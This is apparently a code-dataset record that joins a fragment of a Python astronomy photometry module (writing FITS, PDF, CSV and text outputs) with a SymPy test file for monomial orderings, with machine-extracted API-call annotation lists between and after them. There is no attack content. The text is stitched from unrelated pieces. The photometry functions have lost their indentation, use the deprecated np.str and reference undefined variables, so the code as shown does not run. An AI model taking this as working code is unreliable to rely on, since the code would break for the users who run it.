        The desired file name of the new fits file
    data: array-like
        Contains all the image data
    im_headers: list
        The headers of the individual images combined into the new image
    wcs_header: Header
        Header containing the WCS solution, merged into the output header
    Returns
    -------
    avg_airmass: float
        the amount of atmosphere obscuring the target, found in the image
        headers; here the airmass of all images is averaged
    bjd: float
        Barycentric Julian Date of the mean mid-exposure time
    header: Header
        the header of the first image, updated with the WCS solution, average
        airmass, and BJD
'''
for keys in wcs_header:
if keys not in ['HISTORY', 'COMMENT']:
im_headers[0][keys] = wcs_header[keys]
airmass = []
for i in im_headers:
airmass.append(i['AIRMASS'])
avg_airmass = np.mean(airmass)
im_headers[0]['AIRMASS'] = avg_airmass
jd_middle = np.zeros(len(im_headers))
for i in range(len(im_headers)):
jd_middle[i] = Time(im_headers[i]['DATE-OBS'], format='isot').jd
exptime = im_headers[i]['EXPTIME']
jd_middle[i] = jd_middle[i] + (exptime/2.0)/3600.0/24.0
isot_date_obs = Time(np.mean(jd_middle), format='jd').isot
tele = im_headers[0]['SITEID']
brv,bjd,bvcorr = saph.utils.brvc(isot_date_obs,0.0,tele,ra=ra,dec=dec,epoch=epoch, pmra=pmra, pmdec=pmdec, px=plx)
im_headers[0]['BJD'] = bjd[0]
header = im_headers[0]
hdu_p = fits.PrimaryHDU(data=data, header=header)
hdu = fits.HDUList([hdu_p])
hdu.writeto(fn)
return avg_airmass, bjd, header
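# --- Editor's note: illustrative sketch, not part of the original file. ------
# write_fits() timestamps the stack at the mean mid-exposure time: each frame's
# start JD is shifted by half its exposure time, converted from seconds to days.
def _mid_exposure_jd_sketch(jd_start=2459000.5, exptime=600.0):
    # a 600 s exposure adds 300 s = 0.00347 d, giving ~2459000.50347
    return jd_start + (exptime / 2.0) / 3600.0 / 24.0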
def write_pdf(name, images, model=None, final_stars=None, residual_stars=None, fluxes=None, plot_res=None):
pp = PdfPages(name)
for i in range(len(images)):
fig, ax = plt.subplots(1, figsize=(10, 10))
norm = ImageNormalize(images[i], interval=ZScaleInterval(), stretch=SqrtStretch())
im = ax.imshow(images[i], norm=norm)
plt.colorbar(im)
plt.tight_layout()
pp.savefig()
plt.close()
if model is not None:
fig, ax = plt.subplots(1, figsize=(10, 10))
psf = ax.imshow(model)
plt.colorbar(psf)
ax.set_title('PSF Model')
plt.tight_layout()
pp.savefig()
plt.close()
if final_stars is not None:
if plot_res == 'y':
nrows = len(final_stars)
ncols = 2
fig, ax = plt.subplots(nrows=nrows, ncols=ncols, figsize=(10, 800), squeeze=True)
ax = ax.ravel()
index = 0
for i in range(0, nrows*ncols, 2):
norm = simple_norm(final_stars[index],'log')
norm2 = simple_norm(residual_stars[index], 'linear')
im = ax[i].imshow(final_stars[index], norm=norm, origin='lower', cmap='viridis', interpolation='none')
fig.colorbar(im, ax = ax[i])
ax[i].set_title(np.str(fluxes[index]))
im_r = ax[i+1].imshow(residual_stars[index], norm=norm2, origin='lower', cmap='viridis', interpolation='none')
fig.colorbar(im_r, ax = ax[i+1])
index = index + 1
plt.tight_layout()
pp.savefig()
plt.close()
pp.close()
def write_csv(name, im_name, bjd, filt, airmass, results, sky):
f = open(name, 'w')
f.write('NAME, ID, BJD, FLUX, FLUX ERROR, MAG, MAG ERROR, FILTER, X POSITION, Y POSITION, AIRMASS, RA, DEC\n')
for i in range(sky.size):
if results['flux_fit'][i] > 0:
star_id = results['id'][i]
flux = results['flux_fit'][i]
fluxerr = results['flux_unc'][i]
mag = -2.5*np.log10(flux)
magerr = (1.08574*fluxerr)/(flux)
x_pos = results['x_fit'][i]
y_pos = results['y_fit'][i]
ra = sky[i].ra.degree
dec = sky[i].dec.degree
f.write(im_name+','+np.str(i)+','+np.str(bjd)+','+np.str(flux)+','+np.str(fluxerr)+','+np.str(mag)+','+np.str(magerr)
+','+filt+','+np.str(x_pos)+','+np.str(y_pos)+','+str(airmass)+','+np.str(ra)+','+np.str(dec)+'\n')
f.close()
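# --- Editor's note: illustrative sketch, not part of the original file. ------
# write_csv() converts each fitted flux to an instrumental magnitude with
# mag = -2.5*log10(flux) and propagates the error with the 2.5/ln(10) ~ 1.0857
# factor.  For flux = 1000 +/- 10:
def _flux_to_mag_sketch(flux=1000.0, fluxerr=10.0):
    mag = -2.5 * np.log10(flux)        # -7.5
    magerr = (1.08574 * fluxerr) / flux   # ~0.0109
    return mag, magerr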
def write_txt(name, sources, stars_tbl, fwhm, results=None, t0=None,t1=None,t2=None,t3=None,t4=None,t5=None):
'''
Short text file with diagnostic info about each image set, specifically
for a successful run of the image set
Parameters
----------
name: string
name of the saved file
sources: Table
tabulated info about all the stars found on the image
stars_tbl: Table
tabulated info about all the stars used to form a psf
results: Table
        tabulated info about all the stars found with the photometry routine
    fwhm: float
        full width at half maximum measured for the image
    t0, t1, t2, t3, t4, t5: float, optional
        timestamps bracketing each processing step; when supplied, the elapsed
        time of each step is appended to the file
    '''
f = open(name, 'w')
f.write('Number of stars in sources: '+np.str(len(sources))+'\nNumber of stars in stars_tbl: '+np.str(len(stars_tbl))
+'\nNumbers of stars in results: '+np.str(len(results))+'\nMin, Max, Median peaks in sources: '
+np.str(np.min(sources['peak']))+', '+np.str(np.max(sources['peak']))+', '+np.str(np.median(sources['peak']))
+'\nMin, Max, Median fluxes in results: '+np.str(np.min(results['flux_fit']))+', '+np.str(np.max(results['flux_fit']))+', '
+np.str(np.median(results['flux_fit']))+'\nFWHM: '+np.str(fwhm)+'\n')
if t5:
t_1 = t1-t0
t_2 = t2-t1
t_3 = t3-t2
t_4 = t4-t3
t_5 = t5-t4
t_f = t5-t0
f.write('Time to combine images: '+np.str(t_1)+'\nTime to find stars: '+np.str(t_2)+'\nTime to build psf: '
+np.str(t_3)+'\nTime to run photometry: '+np.str(t_4)+'\nTime to get wcs: '+np.str(t_5)+'\nTotal time: '
+np.str(t_f)+'\n')
f.close()
| [((395, 440), 'matplotlib.rcParams.update', 'matplotlib.rcParams.update', (["{'font.size': 12}"], {}), "({'font.size': 12})\n", (421, 440), False, 'import matplotlib\n'), ((1309, 1325), 'numpy.mean', 'np.mean', (['airmass'], {}), '(airmass)\n', (1316, 1325), True, 'import numpy as np\n'), ((1747, 1854), 'saphires.utils.brvc', 'saph.utils.brvc', (['isot_date_obs', '(0.0)', 'tele'], {'ra': 'ra', 'dec': 'dec', 'epoch': 'epoch', 'pmra': 'pmra', 'pmdec': 'pmdec', 'px': 'plx'}), '(isot_date_obs, 0.0, tele, ra=ra, dec=dec, epoch=epoch, pmra\n =pmra, pmdec=pmdec, px=plx)\n', (1762, 1854), True, 'import saphires as saph\n'), ((1918, 1959), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', ([], {'data': 'data', 'header': 'header'}), '(data=data, header=header)\n', (1933, 1959), True, 'import astropy.io.fits as fits\n'), ((1970, 1991), 'astropy.io.fits.HDUList', 'fits.HDUList', (['[hdu_p]'], {}), '([hdu_p])\n', (1982, 1991), True, 'import astropy.io.fits as fits\n'), ((2167, 2181), 'matplotlib.backends.backend_pdf.PdfPages', 'PdfPages', (['name'], {}), '(name)\n', (2175, 2181), False, 'from matplotlib.backends.backend_pdf import PdfPages\n'), ((2233, 2266), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)'], {'figsize': '(10, 10)'}), '(1, figsize=(10, 10))\n', (2245, 2266), True, 'import matplotlib.pyplot as plt\n'), ((2411, 2427), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['im'], {}), '(im)\n', (2423, 2427), True, 'import matplotlib.pyplot as plt\n'), ((2436, 2454), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2452, 2454), True, 'import matplotlib.pyplot as plt\n'), ((2484, 2495), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2493, 2495), True, 'import matplotlib.pyplot as plt\n'), ((2540, 2573), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)'], {'figsize': '(10, 10)'}), '(1, figsize=(10, 10))\n', (2552, 2573), True, 'import matplotlib.pyplot as plt\n'), ((2613, 2630), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['psf'], {}), '(psf)\n', (2625, 2630), True, 'import matplotlib.pyplot as plt\n'), ((2673, 2691), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2689, 2691), True, 'import matplotlib.pyplot as plt\n'), ((2721, 2732), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2730, 2732), True, 'import matplotlib.pyplot as plt\n'), ((1471, 1517), 'astropy.time.Time', 'Time', (["im_headers[i]['DATE-OBS']"], {'format': '"""isot"""'}), "(im_headers[i]['DATE-OBS'], format='isot')\n", (1475, 1517), False, 'from astropy.time import Time\n'), ((1653, 1671), 'numpy.mean', 'np.mean', (['jd_middle'], {}), '(jd_middle)\n', (1660, 1671), True, 'import numpy as np\n'), ((2874, 2945), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': 'nrows', 'ncols': 'ncols', 'figsize': '(10, 800)', 'squeeze': '(True)'}), '(nrows=nrows, ncols=ncols, figsize=(10, 800), squeeze=True)\n', (2886, 2945), True, 'import matplotlib.pyplot as plt\n'), ((3614, 3632), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3630, 3632), True, 'import matplotlib.pyplot as plt\n'), ((3670, 3681), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3679, 3681), True, 'import matplotlib.pyplot as plt\n'), ((2317, 2333), 'astropy.visualization.ZScaleInterval', 'ZScaleInterval', ([], {}), '()\n', (2331, 2333), False, 'from astropy.visualization import ZScaleInterval, SqrtStretch, ImageNormalize\n'), ((2343, 2356), 'astropy.visualization.SqrtStretch', 'SqrtStretch', ([], {}), '()\n', (2354, 2356), False, 'from 
astropy.visualization import ZScaleInterval, SqrtStretch, ImageNormalize\n'), ((4119, 4133), 'numpy.log10', 'np.log10', (['flux'], {}), '(flux)\n', (4127, 4133), True, 'import numpy as np\n'), ((5794, 5806), 'numpy.str', 'np.str', (['fwhm'], {}), '(fwhm)\n', (5800, 5806), True, 'import numpy as np\n'), ((3369, 3390), 'numpy.str', 'np.str', (['fluxes[index]'], {}), '(fluxes[index])\n', (3375, 3390), True, 'import numpy as np\n'), ((6198, 6209), 'numpy.str', 'np.str', (['t_f'], {}), '(t_f)\n', (6204, 6209), True, 'import numpy as np\n'), ((4562, 4573), 'numpy.str', 'np.str', (['dec'], {}), '(dec)\n', (4568, 4573), True, 'import numpy as np\n'), ((5751, 5781), 'numpy.median', 'np.median', (["results['flux_fit']"], {}), "(results['flux_fit'])\n", (5760, 5781), True, 'import numpy as np\n'), ((6152, 6163), 'numpy.str', 'np.str', (['t_5'], {}), '(t_5)\n', (6158, 6163), True, 'import numpy as np\n'), ((4547, 4557), 'numpy.str', 'np.str', (['ra'], {}), '(ra)\n', (4553, 4557), True, 'import numpy as np\n'), ((5697, 5724), 'numpy.max', 'np.max', (["results['flux_fit']"], {}), "(results['flux_fit'])\n", (5703, 5724), True, 'import numpy as np\n'), ((6118, 6129), 'numpy.str', 'np.str', (['t_4'], {}), '(t_4)\n', (6124, 6129), True, 'import numpy as np\n'), ((5656, 5683), 'numpy.min', 'np.min', (["results['flux_fit']"], {}), "(results['flux_fit'])\n", (5662, 5683), True, 'import numpy as np\n'), ((6077, 6088), 'numpy.str', 'np.str', (['t_3'], {}), '(t_3)\n', (6083, 6088), True, 'import numpy as np\n'), ((4512, 4525), 'numpy.str', 'np.str', (['y_pos'], {}), '(y_pos)\n', (4518, 4525), True, 'import numpy as np\n'), ((5567, 5593), 'numpy.median', 'np.median', (["sources['peak']"], {}), "(sources['peak'])\n", (5576, 5593), True, 'import numpy as np\n'), ((6024, 6035), 'numpy.str', 'np.str', (['t_2'], {}), '(t_2)\n', (6030, 6035), True, 'import numpy as np\n'), ((4494, 4507), 'numpy.str', 'np.str', (['x_pos'], {}), '(x_pos)\n', (4500, 4507), True, 'import numpy as np\n'), ((5530, 5553), 'numpy.max', 'np.max', (["sources['peak']"], {}), "(sources['peak'])\n", (5536, 5553), True, 'import numpy as np\n'), ((5987, 5998), 'numpy.str', 'np.str', (['t_1'], {}), '(t_1)\n', (5993, 5998), True, 'import numpy as np\n'), ((5493, 5516), 'numpy.min', 'np.min', (["sources['peak']"], {}), "(sources['peak'])\n", (5499, 5516), True, 'import numpy as np\n'), ((4445, 4459), 'numpy.str', 'np.str', (['magerr'], {}), '(magerr)\n', (4451, 4459), True, 'import numpy as np\n'), ((4429, 4440), 'numpy.str', 'np.str', (['mag'], {}), '(mag)\n', (4435, 4440), True, 'import numpy as np\n'), ((4409, 4424), 'numpy.str', 'np.str', (['fluxerr'], {}), '(fluxerr)\n', (4415, 4424), True, 'import numpy as np\n'), ((4392, 4404), 'numpy.str', 'np.str', (['flux'], {}), '(flux)\n', (4398, 4404), True, 'import numpy as np\n'), ((4376, 4387), 'numpy.str', 'np.str', (['bjd'], {}), '(bjd)\n', (4382, 4387), True, 'import numpy as np\n'), ((4362, 4371), 'numpy.str', 'np.str', (['i'], {}), '(i)\n', (4368, 4371), True, 'import numpy as np\n')] |
ichuang/sympy | sympy/polys/tests/test_monomialtools.py | 18afbcc7df2ebf2280ea5a88fde8ece34182ae71 | """Tests for tools and arithmetics for monomials of distributed polynomials. """
from sympy.polys.monomialtools import (
monomials, monomial_count,
monomial_key, lex, grlex, grevlex,
monomial_mul, monomial_div,
monomial_gcd, monomial_lcm,
monomial_max, monomial_min,
monomial_divides,
Monomial,
InverseOrder, ProductOrder
)
from sympy.polys.polyerrors import ExactQuotientFailed
from sympy.abc import a, b, c, x, y, z
from sympy.utilities.pytest import raises
def test_monomials():
assert sorted(monomials([], 0)) == [1]
assert sorted(monomials([], 1)) == [1]
assert sorted(monomials([], 2)) == [1]
assert sorted(monomials([], 3)) == [1]
assert sorted(monomials([x], 0)) == [1]
assert sorted(monomials([x], 1)) == [1, x]
assert sorted(monomials([x], 2)) == [1, x, x**2]
assert sorted(monomials([x], 3)) == [1, x, x**2, x**3]
assert sorted(monomials([x, y], 0)) == [1]
assert sorted(monomials([x, y], 1)) == [1, x, y]
assert sorted(monomials([x, y], 2)) == [1, x, y, x**2, y**2, x*y]
assert sorted(monomials([x, y], 3)) == [1, x, y, x**2, x**3, y**2, y**3, x*y, x*y**2, y*x**2]
def test_monomial_count():
assert monomial_count(2, 2) == 6
assert monomial_count(2, 3) == 10
def test_lex_order():
assert lex((1,2,3)) == (1,2,3)
assert str(lex) == 'lex'
assert lex((1,2,3)) == lex((1,2,3))
assert lex((2,2,3)) > lex((1,2,3))
assert lex((1,3,3)) > lex((1,2,3))
assert lex((1,2,4)) > lex((1,2,3))
assert lex((0,2,3)) < lex((1,2,3))
assert lex((1,1,3)) < lex((1,2,3))
assert lex((1,2,2)) < lex((1,2,3))
def test_grlex_order():
assert grlex((1,2,3)) == (6, (1,2,3))
assert str(grlex) == 'grlex'
assert grlex((1,2,3)) == grlex((1,2,3))
assert grlex((2,2,3)) > grlex((1,2,3))
assert grlex((1,3,3)) > grlex((1,2,3))
assert grlex((1,2,4)) > grlex((1,2,3))
assert grlex((0,2,3)) < grlex((1,2,3))
assert grlex((1,1,3)) < grlex((1,2,3))
assert grlex((1,2,2)) < grlex((1,2,3))
assert grlex((2,2,3)) > grlex((1,2,4))
assert grlex((1,3,3)) > grlex((1,2,4))
assert grlex((0,2,3)) < grlex((1,2,2))
assert grlex((1,1,3)) < grlex((1,2,2))
def test_grevlex_order():
assert grevlex((1,2,3)) == (6, (-3,-2,-1))
assert str(grevlex) == 'grevlex'
assert grevlex((1,2,3)) == grevlex((1,2,3))
assert grevlex((2,2,3)) > grevlex((1,2,3))
assert grevlex((1,3,3)) > grevlex((1,2,3))
assert grevlex((1,2,4)) > grevlex((1,2,3))
assert grevlex((0,2,3)) < grevlex((1,2,3))
assert grevlex((1,1,3)) < grevlex((1,2,3))
assert grevlex((1,2,2)) < grevlex((1,2,3))
assert grevlex((2,2,3)) > grevlex((1,2,4))
assert grevlex((1,3,3)) > grevlex((1,2,4))
assert grevlex((0,2,3)) < grevlex((1,2,2))
assert grevlex((1,1,3)) < grevlex((1,2,2))
assert grevlex((0,1,1)) > grevlex((0,0,2))
assert grevlex((0,3,1)) < grevlex((2,2,1))
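# --- Editor's note: illustrative, not part of the original test file. --------
# The grevlex key sorts first by total degree and then by the reversed,
# negated exponent tuple, which is what breaks ties such as
# (0, 1, 1) > (0, 0, 2) above:
def _grevlex_key_sketch(monom=(1, 2, 3)):
    return (sum(monom), tuple(-e for e in reversed(monom)))  # (6, (-3, -2, -1))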
def test_InverseOrder():
ilex = InverseOrder(lex)
igrlex = InverseOrder(grlex)
assert ilex((1,2,3)) > ilex((2, 0, 3))
assert igrlex((1, 2, 3)) < igrlex((0, 2, 3))
assert str(ilex) == "ilex"
assert str(igrlex) == "igrlex"
def test_ProductOrder():
P = ProductOrder((grlex, lambda m: m[:2]), (grlex, lambda m: m[2:]))
assert P((1, 3, 3, 4, 5)) > P((2, 1, 5, 5, 5))
assert str(P) == "ProductOrder(grlex, grlex)"
def test_monomial_key():
assert monomial_key() == lex
assert monomial_key('lex') == lex
assert monomial_key('grlex') == grlex
assert monomial_key('grevlex') == grevlex
raises(ValueError, "monomial_key('foo')")
raises(ValueError, "monomial_key(1)")
def test_monomial_mul():
assert monomial_mul((3,4,1), (1,2,0)) == (4,6,1)
def test_monomial_div():
assert monomial_div((3,4,1), (1,2,0)) == (2,2,1)
def test_monomial_gcd():
assert monomial_gcd((3,4,1), (1,2,0)) == (1,2,0)
def test_monomial_lcm():
assert monomial_lcm((3,4,1), (1,2,0)) == (3,4,1)
def test_monomial_max():
assert monomial_max((3,4,5), (0,5,1), (6,3,9)) == (6,5,9)
def test_monomial_min():
assert monomial_min((3,4,5), (0,5,1), (6,3,9)) == (0,3,1)
def test_monomial_divides():
assert monomial_divides((1,2,3), (4,5,6)) is True
assert monomial_divides((1,2,3), (0,5,6)) is False
def test_Monomial():
m = Monomial((3, 4, 1), (x, y, z))
n = Monomial((1, 2, 0), (x, y, z))
assert m.as_expr() == x**3*y**4*z
assert n.as_expr() == x**1*y**2
assert m.as_expr(a, b, c) == a**3*b**4*c
assert n.as_expr(a, b, c) == a**1*b**2
assert m.exponents == (3, 4, 1)
assert m.gens == (x, y, z)
assert n.exponents == (1, 2, 0)
assert n.gens == (x, y, z)
assert m == (3, 4, 1)
assert n != (3, 4, 1)
assert m != (1, 2, 0)
assert n == (1, 2, 0)
assert m[0] == m[-3] == 3
assert m[1] == m[-2] == 4
assert m[2] == m[-1] == 1
assert n[0] == n[-3] == 1
assert n[1] == n[-2] == 2
assert n[2] == n[-1] == 0
assert m[:2] == (3, 4)
assert n[:2] == (1, 2)
assert m*n == Monomial((4, 6, 1))
assert m/n == Monomial((2, 2, 1))
assert m*(1, 2, 0) == Monomial((4, 6, 1))
assert m/(1, 2, 0) == Monomial((2, 2, 1))
assert m.gcd(n) == Monomial((1, 2, 0))
assert m.lcm(n) == Monomial((3, 4, 1))
assert m.gcd((1, 2, 0)) == Monomial((1, 2, 0))
assert m.lcm((1, 2, 0)) == Monomial((3, 4, 1))
assert m**0 == Monomial((0, 0, 0))
assert m**1 == m
assert m**2 == Monomial((6, 8, 2))
assert m**3 == Monomial((9,12, 3))
raises(ExactQuotientFailed, "m/Monomial((5, 2, 0))")
| [((2975, 2992), 'sympy.polys.monomialtools.InverseOrder', 'InverseOrder', (['lex'], {}), '(lex)\n', (2987, 2992), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3006, 3025), 'sympy.polys.monomialtools.InverseOrder', 'InverseOrder', (['grlex'], {}), '(grlex)\n', (3018, 3025), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3219, 3283), 'sympy.polys.monomialtools.ProductOrder', 'ProductOrder', (['(grlex, lambda m: m[:2])', '(grlex, lambda m: m[2:])'], {}), '((grlex, lambda m: m[:2]), (grlex, lambda m: m[2:]))\n', (3231, 3283), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3576, 3617), 'sympy.utilities.pytest.raises', 'raises', (['ValueError', '"""monomial_key(\'foo\')"""'], {}), '(ValueError, "monomial_key(\'foo\')")\n', (3582, 3617), False, 'from sympy.utilities.pytest import raises\n'), ((3622, 3659), 'sympy.utilities.pytest.raises', 'raises', (['ValueError', '"""monomial_key(1)"""'], {}), "(ValueError, 'monomial_key(1)')\n", (3628, 3659), False, 'from sympy.utilities.pytest import raises\n'), ((4321, 4351), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(3, 4, 1)', '(x, y, z)'], {}), '((3, 4, 1), (x, y, z))\n', (4329, 4351), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((4360, 4390), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(1, 2, 0)', '(x, y, z)'], {}), '((1, 2, 0), (x, y, z))\n', (4368, 4390), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5537, 5589), 'sympy.utilities.pytest.raises', 'raises', (['ExactQuotientFailed', '"""m/Monomial((5, 2, 0))"""'], {}), "(ExactQuotientFailed, 'm/Monomial((5, 2, 0))')\n", (5543, 5589), False, 'from sympy.utilities.pytest import raises\n'), ((1202, 1222), 'sympy.polys.monomialtools.monomial_count', 'monomial_count', (['(2)', '(2)'], {}), '(2, 2)\n', (1216, 1222), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1239, 1259), 'sympy.polys.monomialtools.monomial_count', 'monomial_count', (['(2)', '(3)'], {}), '(2, 3)\n', (1253, 1259), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1300, 1314), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1303, 1314), False, 'from 
sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1365, 1379), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1368, 1379), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1381, 1395), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1384, 1395), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1406, 1420), 'sympy.polys.monomialtools.lex', 'lex', (['(2, 2, 3)'], {}), '((2, 2, 3))\n', (1409, 1420), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1421, 1435), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1424, 1435), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1445, 1459), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 3, 3)'], {}), '((1, 3, 3))\n', (1448, 1459), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1460, 1474), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1463, 1474), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1484, 1498), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (1487, 1498), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1499, 1513), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1502, 1513), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1524, 1538), 'sympy.polys.monomialtools.lex', 'lex', (['(0, 2, 3)'], {}), '((0, 2, 3))\n', (1527, 1538), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1539, 1553), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 
3))\n', (1542, 1553), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1563, 1577), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 1, 3)'], {}), '((1, 1, 3))\n', (1566, 1577), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1578, 1592), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1581, 1592), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1602, 1616), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (1605, 1616), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1617, 1631), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1620, 1631), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1666, 1682), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1671, 1682), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1742, 1758), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1747, 1758), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1760, 1776), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1765, 1776), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1787, 1803), 'sympy.polys.monomialtools.grlex', 'grlex', (['(2, 2, 3)'], {}), '((2, 2, 3))\n', (1792, 1803), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, 